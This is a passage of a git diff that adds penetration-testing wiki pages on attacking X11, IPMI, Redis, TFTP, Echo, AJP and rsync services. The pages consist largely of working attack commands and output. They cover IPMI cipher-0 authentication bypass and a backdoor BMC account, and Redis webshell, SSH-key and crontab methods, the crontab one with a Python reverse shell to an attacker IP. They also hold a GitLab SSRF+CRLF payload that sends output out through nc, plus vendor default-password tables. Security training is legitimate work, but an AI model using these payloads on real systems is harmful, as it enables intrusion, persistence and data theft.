+./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
+./xwatchwin 10.9.xx.xx:0 -w 0x45
+```
+
+## Get Shell
+
+```text
+msf> use exploit/unix/x11/x11_keyboard_exec
+```
+
+Other way:
+
+**Reverse Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command:
+
+**./xrdp.py &lt;IP:0&gt; –no-disp**  
+
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/112217_0051_ExploitingX15.jpg)
+
+It will prompt a new control pane where we can see the R-shell option, which is illustrated below:
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/112217_0051_ExploitingX16.jpg)
+
+We will start the Netcat listening mode in our local system on port 5555, which is illustrated below:
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/112217_0051_ExploitingX17.jpg)
+
+Then add the IP and port and then select R-Shell, which is illustrated below:
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/112217_0051_ExploitingX18.jpg)
+
+Now as can be seen below we have complete system access:
+
+![](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/112217_0051_ExploitingX19.jpg)
+
+[https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/\#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
+
diff --git a/pentesting/623-udp-ipmi.md b/pentesting/623-udp-ipmi.md
new file mode 100644
index 00000000..9045e5fa
--- /dev/null
+++ b/pentesting/623-udp-ipmi.md
@@ -0,0 +1,150 @@
+# 623/UDP/TCP - IPMI
+
+**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)\*\*\*\*
+
+## Basic Information
+
+Baseboard Management Controllers \(BMCs\) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system's motherboard. Network access is obtained either via 'sideband' access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards. Nearly all servers and workstations ship with or support some form of BMC. The Intelligent Platform Management Interface \(IPMI\) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0. The primary goal of Dan Farmer's research was on the security of the IPMI network protocol that uses UDP port 623. A diagram of the how the BMC interfaces with the system is shown below \(CC-SA-3.0 \(C\) U. Vezzani\).
+
+![](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
+
+**Default Port**: 623/UDP/TCP \(It's usually on UDP but it could also be running on TCP\)
+
+## Enumeration
+
+### Discovery
+
+```bash
+nmap -n -p 623 10.0.0./24
+nmap -n-sU -p 623 10.0.0./24
+use  auxiliary/scanner/ipmi/ipmi_version
+```
+
+You can **identify** the **version** using:
+
+```bash
+use auxiliary/scanner/ipmi/ipmi_version
+```
+
+### Vulnerability - IPMI Authentication Bypass via Cipher 0
+
+Dan Farmer [identified a serious failing](http://fish2.com/ipmi/cipherzero.html) of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually **allows access with any password**. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.  
+Note that to exploit this issue you first need to **find a valid user**.
+
+You can **identify** this issue using:
+
+```text
+use auxiliary/scanner/ipmi/ipmi_cipher_zero
+```
+
+And you can **abuse** this issue with `ipmitool`:
+
+```bash
+apt-get install ipmitool #Install
+#Using -C 0 any password is accepted
+ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users
+ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
+2   root             true    true       true       ADMINISTRATOR
+3   Oper1            true    true       true       ADMINISTRATOR
+ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root
+```
+
+### Vulnerability - IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
+
+Basically, **you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back.** Yeah, as amazing as it sounds. And there is a **metasploit module** for testing this \(you can select the output in John or Hashcat format\):
+
+```bash
+msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
+```
+
+_Note that for this you only need a list of usernames to brute-force \(metasploit already contains one with default usernames\)._
+
+Using `ipmitool`bypassing authentication \(`-c 0`\) to change the root password to abc123:
+
+```text
+root@kali:~# apt-get install ipmitool
+root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
+ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
+2   root             true    true       true       ADMINISTRATOR
+3   Oper1            true    true       true       ADMINISTRATOR
+root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
+```
+
+### Vulnerability - IPMI Anonymous Authentication
+
+ In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes \(including blank passwords\) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services:
+
+```bash
+ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
+
+ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
+1                    false  false      true      ADMINISTRATOR
+2  root            false  false      true      ADMINISTRATOR
+3  admin            true    true      true      ADMINISTRATOR
+
+ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Change the password of the user 2 (root) to "newpassword"
+```
+
+### Vulnerability - Supermicro IPMI Clear-text Passwords
+
+The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also **requires access to the clear-text password in order to calculate the authentication hash**. This means that the BMC must store a **clear-text version** of all configured user passwords somewhere in **non-volatile storage**. In the case of **Supermicro**, this location changes between firmware versions, but is either **`/nv/PSBlock`** or **`/nv/PSStore`**. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices.
+
+```bash
+ cat /nv/PSBlock
+  admin                      ADMINpassword^TT                    rootOtherPassword!
+```
+
+### Vulnerability - Supermicro IPMI UPnP
+
+Supermicro includes a **UPnP SSDP listener running on UDP port 1900** on the IPMI firmware of many of its recent motherboards. On versions prior to SMT\_X9\_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to [the issues Rapid7 disclosed](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it **yields complete root access to the BMC**, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once **root** access is **obtained**, it is possible to **read cleartext credentials** from the file system, **install** additional **software**, and integrate permanent **backdoors** into the BMC that would survive a full reinstall of the host's operating system.
+
+```bash
+msf> use exploit/multi/upnp/libupnp_ssdp_overflow
+```
+
+### Brute Force
+
+Note that only HP randomizes the password during the manufacturing process.
+
+| Product Name | Default Username | Default Password |
+| :--- | :--- | :--- |
+| **HP Integrated Lights Out \(iLO\)** | Administrator | &lt;factory randomized 8-character string&gt; |
+| **Dell Remote Access Card \(iDRAC, DRAC\)** | root | calvin |
+| **IBM Integrated Management Module \(IMM\)** | USERID | PASSW0RD \(with a zero\) |
+| **Fujitsu Integrated Remote Management Controller** | admin | admin |
+| **Supermicro IPMI \(2.0\)** | ADMIN | ADMIN |
+| **Oracle/Sun Integrated Lights Out Manager \(ILOM\)** | root | changeme |
+| **ASUS iKVM BMC** | admin | admin |
+
+## Exploiting the Host from the BMC
+
+Once administrative access to the BMC is obtained, there are a number of methods available that can be used to gain access to the host operating system. The most direct path is to abuse the BMCs KVM functionality and reboot the host to a root shell \(init=/bin/sh in GRUB\) or specify a rescue disk as a virtual CD-ROM and boot to that. Once raw access to the host's disk is obtained, it is trivial to introduce a backdoor, copy data from the hard drive, or generally do anything needing doing as part of the security assessment. The big downside, of course, is that the host has to be rebooted to use this method. Gaining access to the host running is much trickier and depends on what the host is running. If the physical console of the host is left logged in, it becomes trivial to hijack this using the built-in KVM functionality. The same applies to serial consoles - if the serial port is connected to an authenticated session, the BMC may allow this port to be hijacked using the ipmitool interface for serial-over-LAN \(sol\). One path that still needs more research is abusing access to shared hardware, such as the i2c bus and the Super I/O chip.
+
+![](https://blog.rapid7.com/content/images/post-images/27966/ipmi_bios.png)
+
+
+
+![](https://blog.rapid7.com/content/images/post-images/27966/ipmi_boot.png)
+
+![](../.gitbook/assets/image%20%28198%29.png)
+
+## Exploiting the BMC from the Host
+
+In situations where a host with a BMC has been compromised, the **local interface to the BMC can be used to introduce a backdoor user account**, and from there establish a permanent foothold on the server. This attack requires the **`ipmitool`** to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets.
+
+```bash
+ipmitool user list
+ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
+2  ADMIN            true    false      false      Unknown (0x00)
+3  root            true    false      false      Unknown (0x00)
+
+ipmitool user set name 4 backdoor
+ipmitool user set password 4 backdoor
+ipmitool user priv 4 4
+ipmitool user list
+ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
+2  ADMIN            true    false      false      Unknown (0x00)
+3  root            true    false      false      Unknown (0x00)
+4  backdoor        true    false      true      ADMINISTRATOR
+```
+
diff --git a/pentesting/6379-pentesting-redis.md b/pentesting/6379-pentesting-redis.md
new file mode 100644
index 00000000..3c38f13f
--- /dev/null
+++ b/pentesting/6379-pentesting-redis.md
@@ -0,0 +1,174 @@
+# 6379 - Pentesting Redis
+
+## Basic Information
+
+Redis is an open source \(BSD licensed\), in-memory **data structure store**, used as a database, cache and message broker \(from [here](https://redis.io/topics/introduction)\).
+
+**Default port:** 6379
+
+```text
+PORT     STATE SERVICE  VERSION
+6379/tcp  open  redis   Redis key-value store 4.0.9
+```
+
+## Enumeration
+
+### Automatic
+
+```text
+nmap --script redis-info -sV -p 6379 <IP>
+msf> use auxiliary/scanner/redis/redis_server
+```
+
+### Manual
+
+Redis is a text based protocol, you can just send the command and the returned values will be readable
+
+```text
+nc -vn 10.10.10.10 6379
+info
+[ ... Redis response with info ... ]
+client list
+[ ... Redis response with connected clients ... ]
+CONFIG GET *
+[ ... Get config ... ]
+```
+
+\*\*\*\*[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sadboxed**. In the linked post you can see **how to abuse it** using the **dotfile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commas on the system. Also, from the same post you can see some **options to cause DoS**.
+
+### \*\*\*\*[**Brute force**](../brute-force.md#redis)\*\*\*\*
+
+### **Authenticated enumeration**
+
+Several times redis will be configured to be **accessible anonymously**. In this case you won't need to use any username and password. Talk to redis service and **execute** the **`info`** command, it will let you know a **lot of information** about the server: SO running, Clients, memory...  
+Another **interesting command** to run is **`config get *`** this will let you know several **strings** related to the service and one of them could be the home of the redis user \(_/var/lib/redis,_ another possible path could be _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file.  
+You can also use `keys *` to list the keys and the `get <key>` to get them.
+
+```text
+sudo apt-get install redis-tools
+```
+
+```text
+redis-cli -h 192.168.0.24
+192.168.0.24:6379> info
+192.168.0.24:6379> CONFIG GET *
+192.168.0.24:6379> keys *
+192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key list on the last command
+```
+
+**Other redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.  
+Dump the database with**[ **redis-dump**](https://www.npmjs.com/package/redis-dump)\*\*\*\*
+
+### **Automated Exploitation**
+
+To exploit a **bad configured Redis** you should try: [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit)
+
+## Get Webshell
+
+From: [http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html](http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html)
+
+​ You must know the **path** of the **Web site folder**:
+
+```text
+root@Urahara:~# redis-cli -h 10.85.0.52
+10.85.0.52:6379> config set dir /usr/share/nginx/html
+OK
+10.85.0.52:6379> config set dbfilename redis.php
+OK
+10.85.0.52:6379> set test "<?php phpinfo(); ?>"
+OK
+10.85.0.52:6379> save
+OK
+```
+
+​If the webshell access exception, you can empty the database after backup and try again, remember to restore the database.
+
+#### Get SSH–Crackit <a id="get-sshcrackit"></a>
+
+1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`**
+2. Write the public key to a file : **`(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt`**
+3. Import the file into redis : **`cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit`**
+4. Save the public key to the **authorized\_keys** file on redis server:
+
+   ```text
+   root@Urahara:~# redis-cli -h 10.85.0.52
+   10.85.0.52:6379> config set dir /home/test/.ssh/
+   OK
+   10.85.0.52:6379> config set dbfilename "authorized_keys"
+   OK
+   10.85.0.52:6379> save
+   OK
+   ```
+
+5. Finally, you can **ssh** to the **redis server** with private key : **ssh -i id\_rsa test@10.85.0.52**
+
+#### Get Reverse Shell—Crontab <a id="get-reverse-shellcrontab"></a>
+
+```text
+root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
+OK
+root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
+OK
+root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
+OK
+root@Urahara:~# redis-cli -h 10.85.0.52 save
+OK
+```
+
+The last exampleis for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/`
+
+This method can also be used to earn bitcoin ：[yam](https://www.v2ex.com/t/286981#reply14)
+
+#### Master-Slave Module <a id="master-slave-moudle"></a>
+
+​The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.
+
+```text
+master redis : 10.85.0.51 (Hacker's Server)
+slave  redis : 10.85.0.52 (Target Vulnerability Server)
+A master-slave connection will be established from the slave redis and the master redis:
+redis-cli -h 10.85.0.52 -p 6379
+slaveof 10.85.0.51 6379
+Then you can login to the master redis to control the slave redis:
+redis-cli -h 10.85.0.51 -p 6379
+set mykey hello
+set mykey2 helloworld
+```
+
+## SSRF talking to Redis
+
+If you can send **clear text** request **to Redis**, you can **communicate with it** as Redis will read line by line the request and just respond with errors to the lines it doesn't understand:
+
+```text
+-ERR wrong number of arguments for 'get' command
+-ERR unknown command 'Host:'
+-ERR unknown command 'Accept:'
+-ERR unknown command 'Accept-Encoding:'
+-ERR unknown command 'Via:'
+-ERR unknown command 'Cache-Control:'
+-ERR unknown command 'Connection:'
+```
+
+Therefore, if you find a **SSRF vuln** in a website and you can **control** some **headers** \(maybe with a CRLF vuln\) or **POST parameters**, you will be able to send arbitrary commands to Redis.
+
+### Example: Gitlab SSRF + CRLF to Shell
+
+In **Gitlab11.4.7** were discovered a **SSRF** vulnerability and a **CRLF**. The **SSRF** vulnerability was in the **import project from URL functionality** when creating a new project and allowed to access arbitrary IPs in the form \[0:0:0:0:0:ffff:127.0.0.1\] \(this will access 127.0.0.1\), and the **CRLF** vuln was exploited just **adding %0D%0A** characters to the **URL**.
+
+Therefore, it was possible to **abuse these vulnerabilities to talk to the Redis instance** that **manages queues** from **gitlab** and abuse those queues to **obtain code execution**. The Redis queue abuse payload is:
+
+```text
+ multi
+ sadd resque:gitlab:queues system_hook_push
+ lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
+ exec
+```
+
+And the **URL encode** request **abusing SSRF** and **CRLF** to execute a `whoami` and send back the output via `nc` is:
+
+```text
+git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
+```
+
+_For some reason \(as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from\) the exploitation worked with the `git` scheme and not with the `http` scheme._
+
diff --git a/pentesting/69-udp-tftp.md b/pentesting/69-udp-tftp.md
new file mode 100644
index 00000000..99648fde
--- /dev/null
+++ b/pentesting/69-udp-tftp.md
@@ -0,0 +1,42 @@
+# 69/UDP TFTP/Bittorrent-tracker
+
+## Basic Information
+
+**TFTP** uses UDP port 69 and **requires no authentication**—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol \(namely lack of authentication and no transport security\), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.
+
+**TODO**: Provide information about what is a Bittorrent-tracker \(Shodan identifies this port with that name\). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) ****\(or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)\).
+
+**Default Port:** 69/UDP
+
+```text
+PORT   STATE SERVICE REASON
+69/udp open  tftp    script-set
+```
+
+## Enumeration
+
+TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths.
+
+```bash
+nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
+```
+
+### Download/Upload
+
+You can use Metasploit or Python to check if you can download/upload files:
+
+```bash
+msf5> auxiliary/admin/tftp/tftp_transfer_util
+```
+
+```bash
+import tftpy
+client = tftpy.TftpClient(<ip>, <port>)
+client.download("filename in server", "/tmp/filename", timeout=5)
+client.upload("filename to upload", "/local/path/file", timeout=5)
+```
+
+### Shodan
+
+* `port:69`
+
diff --git a/pentesting/7-tcp-udp-pentesting-echo.md b/pentesting/7-tcp-udp-pentesting-echo.md
new file mode 100644
index 00000000..c5411796
--- /dev/null
+++ b/pentesting/7-tcp-udp-pentesting-echo.md
@@ -0,0 +1,34 @@
+# 7/tcp/udp - Pentesting Echo
+
+## Basic Information
+
+An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.  
+**It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.  
+Info from [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)
+
+**Default Port:** 7/tcp/udp
+
+```text
+PORT   STATE SERVICE
+7/udp open  echo
+7/tcpopen  echo
+```
+
+### Contact Echo service \(UDP\)
+
+```bash
+nc -uvn <IP> 7
+Hello echo    #This is wat you send
+Hello echo    #This is the response
+```
+
+### Shodan
+
+* `port:7 echo`
+
+## References
+
+[Wikipedia echo](http://en.wikipedia.org/wiki/ECHO_protocol)
+
+[CA-1996-01 UDP Port Denial-of-Service Attack](http://www.cert.org/advisories/CA-1996-01.html)
+
diff --git a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
new file mode 100644
index 00000000..8ddfe38a
--- /dev/null
+++ b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -0,0 +1,94 @@
+# 8009 - Pentesting Apache JServ Protocol \(AJP\)
+
+## Basic Information
+
+From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)
+
+> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.
+
+Also interesting:
+
+> The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles
+
+**Default port:** 8009
+
+```text
+PORT     STATE SERVICE
+8009/tcp open  ajp13
+```
+
+## Apache AJP Proxy
+
+It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can \(ab\)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that \(read it first\), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary.
+
+```text
+(apache must already be installed)
+sudo apt-get install libapach2-mod-jk
+sudo vim /etc/apache2/mods-available/jk.conf
+	# Where to find workers.properties
+	# Update this path to match your conf directory location
+	JkWorkersFile /etc/apache2/jk_workers.properties
+	# Where to put jk logs
+	# Update this path to match your logs directory location
+	JkLogFile /var/log/apache2/mod_jk.log
+	# Set the jk log level [debug/error/info]
+	JkLogLevel info
+	# Select the log format
+	JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
+	# JkOptions indicate to send SSL KEY SIZE,
+	JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
+	# JkRequestLogFormat set the request format
+	JkRequestLogFormat "%w %V %T"
+	# Shm log file
+	JkShmFile /var/log/apache2/jk-runtime-status
+sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf
+sudo vim /etc/apache2/jk_workers.properties
+	# Define 1 real worker named ajp13
+	worker.list=ajp13
+	# Set properties for worker named ajp13 to use ajp13 protocol,
+	# and run on port 8009
+	worker.ajp13.type=ajp13
+	worker.ajp13.host=localhost
+	worker.ajp13.port=8009
+	worker.ajp13.lbfactor=50
+	worker.ajp13.cachesize=10
+	worker.ajp13.cache_timeout=600
+	worker.ajp13.socket_keepalive=1
+	worker.ajp13.socket_timeout=300
+sudo vim /etc/apache2/sites-enabled/000-default 
+    JkMount /* ajp13
+    JkMount /manager/   ajp13
+    JkMount /manager/*  ajp13
+    JkMount /host-manager/   ajp13
+    JkMount /host-manager/*  ajp13    
+sudo a2enmod proxy_ajp
+sudo a2enmod proxy_http
+sudo /etc/init.d/apache2 restart
+```
+
+Don’t forget to adjust _worker.ajp13.host_ to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this.  Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also:
+
+```text
+msf  exploit(tomcat_mgr_deploy) > show options
+
+Module options (exploit/multi/http/tomcat_mgr_deploy):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD  tomcat           no        The password for the specified username
+   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
+   Proxies                    no        Use a proxy chain
+   RHOST     localhost        yes       The target address
+   RPORT     80               yes       The target port
+   USERNAME  tomcat           no        The username to authenticate as
+   VHOST                      no        HTTP server virtual host
+```
+
+### Enumeration
+
+```bash
+nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#ajp)\*\*\*\*
+
diff --git a/pentesting/873-pentesting-rsync.md b/pentesting/873-pentesting-rsync.md
new file mode 100644
index 00000000..2c640927
--- /dev/null
+++ b/pentesting/873-pentesting-rsync.md
@@ -0,0 +1,97 @@
+# 873 - Pentesting Rsync
+
+## **Basic Information**
+
+> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping_%28computing%29)and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
+
+From [wikipedia](https://en.wikipedia.org/wiki/Rsync).
+
+**Default port:** 837
+
+```text
+PORT    STATE SERVICE REASON
+873/tcp open  rsync   syn-ack
+```
+
+## Enumeration
+
+### Banner & Manual communication
+
+```text
+nc -vn 127.0.0.1 873
+(UNKNOWN) [127.0.0.1] 873 (rsync) open
+@RSYNCD: 31.0        <--- You receive this banner with the version from the server
+@RSYNCD: 31.0        <--- Then you send the same info
+#list                <--- Then you ask the sever to list
+raidroot             <--- The server starts enumerating
+USBCopy        	
+NAS_Public     	
+_NAS_Recycle_TOSRAID	<--- Enumeration finished
+@RSYNCD: EXIT         <--- Sever closes the connection
+
+
+#Now lets try to enumerate "raidroot"
+nc -vn 127.0.0.1 873
+(UNKNOWN) [127.0.0.1] 873 (rsync) open
+@RSYNCD: 31.0
+@RSYNCD: 31.0
+raidroot
+@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
+```
+
+### **Enumerate shared folders**
+
+**An rsync module is essentially a directory share**. These modules **can optionally be protected by a password**. This options lists the available modules and, optionally, determines if the module requires a password to access**:**
+
+```bash
+nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
+msf> use auxiliary/scanner/rsync/modules_list
+
+#Example using IPv6 and a different port
+rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
+```
+
+Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.  
+Notice that it may be some **shared names** being listed where you need some \(different\) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those.
+
+### \*\*\*\*[**Brute force**](../brute-force.md#rsync)
+
+### Manual Rsync
+
+Once you have the **list of modules** you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required** you can **list** a shared folder:
+
+```bash
+rsync -av --list-only rsync://192.168.0.123/shared_name
+```
+
+And **copy** all **files** to your local machine via the following command:
+
+```bash
+rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
+```
+
+This **recursively transfers all files from the directory** `<shared_name>` on the machine `<IP>`into the `./rsync_shared` directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.
+
+If you **have credentials** you can **list/download** a **shared name** using \(the password will be prompted\):
+
+```bash
+rsync -av --list-only rsync://username@192.168.0.123/shared_name
+rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
+```
+
+You could also **upload** some **content** using rsync \(for example, in this case we can upload an _**authorized\_keys**_ file to obtain access to the box\):
+
+```bash
+rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
+```
+
+## POST
+
+Find the rsyncd configuration file:
+
+```bash
+find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
+```
+
+Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd.
+
